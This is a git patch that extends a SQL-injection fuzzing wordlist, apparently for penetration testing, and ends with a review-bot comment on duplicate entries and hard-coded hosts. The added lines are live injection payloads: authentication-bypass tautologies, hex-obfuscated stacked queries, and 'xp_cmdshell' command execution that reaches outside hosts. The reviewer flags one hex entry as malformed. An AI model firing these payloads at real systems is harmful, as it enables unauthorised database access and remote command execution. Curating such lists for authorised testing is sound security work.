From 2eaeada47162c2a98fc00cbdbfcd66a8c7a44d62 Mon Sep 17 00:00:00 2001
From: Jason Haddix
Date: Wed, 23 Jul 2014 03:48:38 -0700
Subject: [PATCH] Update Generic_SQLi

---
 Fuzzing/Generic_SQLi | 57 +++++++++++++++++++++++++++++++++++++++++---
 1 file changed, 54 insertions(+), 3 deletions(-)

diff --git a/Fuzzing/Generic_SQLi b/Fuzzing/Generic_SQLi
index 7852ed21..4a30a2e1 100644
--- a/Fuzzing/Generic_SQLi
+++ b/Fuzzing/Generic_SQLi
@@ -49,7 +49,6 @@ a' waitfor delay '0:0:10'--
 1;(load_file(char(47,101,116,99,47,112,97,115, ...
 or%201=1
 1 or sleep(__TIME__)#
-));waitfor delay '0:0:__TIME__'--
 or 1=1
 and 1 in (select var from temp)--
 or '7659'='7659
@@ -186,11 +185,9 @@ or 0=0 #
 hi or a=a
 *(|(mail=*))
 password:*/=1--
- or 1=1--
 distinct
 );waitfor delay '0:0:__TIME__'--
 to_timestamp_tz
-;waitfor delay '0:0:__TIME__'--
 ") or benchmark(10000000,MD5(1))#
 UNION SELECT
 %2A%28%7C%28mail%3D%2A%29%29
@@ -214,3 +211,57 @@ x' or 1=1 or 'x'='y
 ?
 or 1/*
 !
+'
+ or a = a
+declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
+declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
+declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
+declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
+' or 1=1
+ or 1=1 --
+x' OR full_name LIKE '%Bob%
+'; exec master..xp_cmdshell 'ping 172.10.1.255'--
+'%20or%20''='
+'%20or%20'x'='x
+')%20or%20('x'='x
+' or 0=0 --
+' or 0=0 #
+ or 0=0 #"
+' or 1=1--
+' or '1'='1'--
+' or 1 --'
+or 1=1--
+' or 1=1 or ''='
+ or 1=1 or ""=
+' or a=a--
+ or a=a
+') or ('a'='a
+'hi' or 'x'='x';
+or
+procedure
+handler
+' or username like '%
+' or uname like '%
+' or userid like '%
+' or uid like '%
+' or user like '%
+'; exec master..xp_cmdshell
+'; exec xp_regread
+t'exec master..xp_cmdshell 'nslookup www.google.com'--
+--sp_password
+' UNION SELECT
+' UNION ALL SELECT
+' or (EXISTS)
+' (select top 1
+'||UTL_HTTP.REQUEST
+1;SELECT%20*
+<>"'%;)(&+
+'%20or%201=1
+'sqlattempt1
+%28
+%29
+%26
+%21
+' or ''='
+' or 3=3
+ or 3=3 --
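Review bot: Several of the 54 added entries duplicate what the file already holds or each other — `' or 1=1--` and `or 1=1--` sit next to the existing `or 1=1` shown as hunk 1 context, `' or 0=0 --` / `' or 0=0 #` next to the existing `or 0=0 #` heading of hunk 2, and `+ or a = a` and `+ or a=a` differ only in whitespace — and a fuzz list is normally deduplicated before merge because every entry costs one request per injection point. The hex-encoded `declare`/`exec` entries appear to hard-code a fixed delay, while hunks 1 and 2 remove the `__TIME__` variants of the same probe; keeping the file's `__TIME__` placeholder convention lets the tester set the timeout once rather than edit opaque hex. The third `declare @q` line also lacks the `select @q =` its three siblings have, so it looks like a malformed copy rather than a deliberate variant and should be reviewed. The two `xp_cmdshell` entries embed a fixed address (`172.10.1.255`) and a third-party host (`www.google.com`), so any target that is actually vulnerable would emit traffic to hosts outside the engagement scope; a placeholder in the file's existing style, such as `__HOST__`, would keep that destination under the tester's control and is easier to audit.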